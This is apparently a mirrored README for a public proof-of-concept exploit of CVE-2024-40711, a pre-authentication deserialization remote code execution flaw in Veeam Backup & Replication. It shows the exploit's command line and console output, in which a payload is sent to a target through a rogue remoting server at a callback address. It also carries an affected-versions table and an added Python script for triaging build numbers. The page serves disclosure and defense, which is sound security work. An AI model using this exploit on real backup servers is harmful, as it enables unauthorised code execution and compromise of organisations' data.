## https://sploitus.com/exploit?id=DA0837C4-50E4-51A9-80F9-5A87E066B33F
# CVE-2024-40711
Exploit for the Veeam Backup & Replication pre-authentication deserialization vulnerability CVE-2024-40711.

See our [blog post](https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/) for the technical details.

Demo video: https://github.com/user-attachments/assets/24e8122c-3e84-408b-87a9-684a9aabeb70

# PoC in Action


```
CVE-2024-40711.exe -f binaryformatter -g Veeam -c http://192.168.201.1:8000/trigger --targetveeam 192.168.201.158



                 __         .__  ___________
__  _  _______ _/  |_  ____ |  |_\__    ___/_____  _  _________
\ \/ \/ /\__  \\   __\/ ___\|  |  \|    | /  _ \ \/ \/ /\_  __ \
 \     /  / __ \|  | \  \___|   Y  \    |(  <_> )     /  |  | \/
  \/\_/  (____  /__|  \___  >___|  /____| \____/ \/\_/   |__|
              \/          \/     \/


        (*) Veeam Backup & Replication Unauthenticated Remote Code Execution Exploit (CVE-2024-40711)
          - Vulnerability Discovered by Florian Hauser (@frycos) at CODE WHITE Gmbh (@codewhitesec)
          - Exploit Written by Sina Kheirkhah (@SinSinology) at watchTowr
          - Thank you to my dear friend Soroush Dalili (@irsdl) for his help

        CVEs: [CVE-2024-40711]

(*) Creating payload for 'cmd /c mspaint.exe'
(*) Wrapping payload in the CDbCryptoKeyInfo custom gadget
(*) Sending Remoting Trigger
(*) Started Rogue Server
HttpServerChannel for 'trigger' created:
  http://192.168.201.1:8000/trigger

Press any key to exit ...
[*] Processing message for '/trigger' from 192.168.201.158:50592 ... sending payload!
```

# Florian Hauser
This vulnerability was found by Florian Hauser ([@frycos](https://x.com/frycos)) of CODE WHITE GmbH ([@codewhitesec](https://x.com/codewhitesec)). Make sure to follow his outstanding research; our role was only to recreate the issue and develop the exploit for it.

# Affected Versions

| Version               | Status                                                                                              |
|-----------------------|-----------------------------------------------------------------------------------------------------|
| 12.2.0.334            | Fully patched. Not affected by CVE-2024-40711.                                                      |
| 12.1.2.172            | Affected, but exploitation requires authentication. Low-privilege users can execute arbitrary code. |
| 12.1.1.56 and earlier | Vulnerable to unauthenticated RCE.                                                                  |
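
The table above gives three build numbers but no rule for the builds that fall between them, which is exactly what matters when triaging a fleet. The following is an added example (not part of the watchTowr PoC or of Veeam's tooling) that turns the table into a comparison over the four-part Veeam build number. The three thresholds are the ones in the table; the decision to report builds strictly between 12.1.1.56 and 12.1.2.172 as `unclassified` rather than guessing, and the host inventory used as input, are assumptions made for the example.

```python
"""Triage Veeam Backup & Replication build numbers against the CVE-2024-40711 table.

Added example, not code from the watchTowr repository. Build numbers are taken
from the Affected Versions table; anything else here is an assumption.
"""
from __future__ import annotations

# Boundaries from the Affected Versions table (major, minor, patch, build).
PATCHED = (12, 2, 0, 334)    # this build and later: fully patched
AUTH_ONLY = (12, 1, 2, 172)  # this build up to PATCHED: exploitable only with credentials
UNAUTH = (12, 1, 1, 56)      # this build and earlier: unauthenticated RCE


def parse_build(version: str) -> tuple[int, int, int, int]:
    """Turn '12.1.2.172' into (12, 1, 2, 172).

    Veeam B&R reports a four-part build number; anything else is rejected so a
    truncated or mistyped value cannot silently compare as 'older' or 'newer'.
    """
    parts = version.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a four-part Veeam build number: {version!r}")
    major, minor, patch, build = (int(p) for p in parts)
    return (major, minor, patch, build)


def classify(version: str) -> str:
    """Return 'patched', 'auth-required', 'unauthenticated' or 'unclassified'.

    Python compares tuples element by element, so the table's ordering falls
    out of plain >= / <= comparisons on the parsed build.
    """
    build = parse_build(version)
    if build >= PATCHED:
        return "patched"
    if build >= AUTH_ONLY:
        return "auth-required"
    if build <= UNAUTH:
        return "unauthenticated"
    # Builds strictly between 12.1.1.56 and 12.1.2.172 are not listed in the table.
    # Assumption for this example: report them rather than guess; treat as
    # exposed until the vendor KB confirms otherwise.
    return "unclassified"


def triage(inventory: dict[str, str]) -> dict[str, list[str]]:
    """Group hosts (hostname -> build string) by their classification, sorted for stable output."""
    groups: dict[str, list[str]] = {
        "unauthenticated": [], "auth-required": [], "unclassified": [], "patched": []
    }
    for host, version in inventory.items():
        groups[classify(version)].append(host)
    for hosts in groups.values():
        hosts.sort()
    return groups


if __name__ == "__main__":
    # Constructed inventory for the example; not real hosts or observed builds.
    sample = {
        "vbr-prod-01": "12.2.0.334",
        "vbr-prod-02": "12.1.2.172",
        "vbr-dr-01": "12.1.1.56",
        "vbr-lab-01": "12.1.1.57",
        "vbr-legacy-01": "11.0.1.1261",
    }
    for status, hosts in triage(sample).items():
        print(f"{status:16s} {', '.join(hosts) or '-'}")
```

Feed the `triage` function whatever produces your build list (the file version of `Veeam.Backup.Manager.exe`, or an asset inventory export) and handle the `unauthenticated` and `unclassified` buckets first: the former is the pre-auth case this PoC demonstrates, the latter is where the table on this page gives you no answer.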


# Exploit authors

This exploit was written by [Sina Kheirkhah (@SinSinology)](https://x.com/SinSinology) of [watchTowr (@watchtowrcyber)](https://twitter.com/watchtowrcyber) 

We'd also like to take the opportunity to thank [Soroush Dalili](https://x.com/irsdl) for his help with this exploit.


# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/
- https://twitter.com/watchtowrcyber
- https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/
- https://github.com/codewhitesec/RogueRemotingServer
- https://github.com/tyranid/ExploitRemotingService
- https://www.veeam.com/kb4649